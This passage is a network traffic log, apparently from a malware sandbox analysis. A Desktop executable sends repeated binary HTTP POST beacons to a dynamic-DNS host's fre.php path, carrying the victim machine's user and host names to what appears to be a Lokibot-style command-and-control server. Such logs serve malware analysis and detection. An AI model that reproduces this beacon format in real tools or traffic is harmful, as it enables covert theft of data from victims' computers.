63	192.168.2.11	64408	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:06.277036905 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:06.283715963 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:07.060122967 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.11	64409	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:07.216347933 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:07.225457907 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:07.996001959 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.11	64410	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:08.302642107 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:08.313595057 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:09.068078041 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.11	64411	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:09.225388050 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:09.230402946 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:10.003968000 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.11	64412	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:10.326421022 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:10.331435919 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:11.079188108 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.11	64413	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:11.234513044 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:11.239805937 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:12.003453970 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.11	64414	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:12.165453911 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:12.172122955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:12.893414021 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.11	64415	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:13.061347961 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:13.068984985 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:13.853063107 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.11	64416	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:14.003642082 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:14.008975029 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:14.776112080 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.11	64417	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:14.930037022 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:14.936067104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:15.763972998 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.11	64418	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:15.921727896 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:15.929178953 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:16.667747974 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.11	64419	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:16.822302103 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:16.827330112 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:17.525538921 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.11	64420	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:17.698632956 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:17.703674078 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:18.554850101 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.11	64421	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:18.709377050 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:18.714301109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:19.379185915 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.11	64422	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:19.542762041 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:19.547744036 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:20.358504057 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.11	64423	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:20.561255932 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:20.566221952 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:21.203330994 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.11	64424	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:21.351571083 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:21.356698990 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:22.048629045 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.11	64425	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:22.215054035 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:22.220180988 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:22.910722017 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.11	64426	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:23.364090919 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:23.369318008 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:23.931077957 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.11	64427	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:24.101181030 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:24.106030941 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:24.748373032 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.11	64428	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:24.905708075 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:22:24.910666943 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:22:25.638870001 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:22:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.11	64429	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:22:25.810230017 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
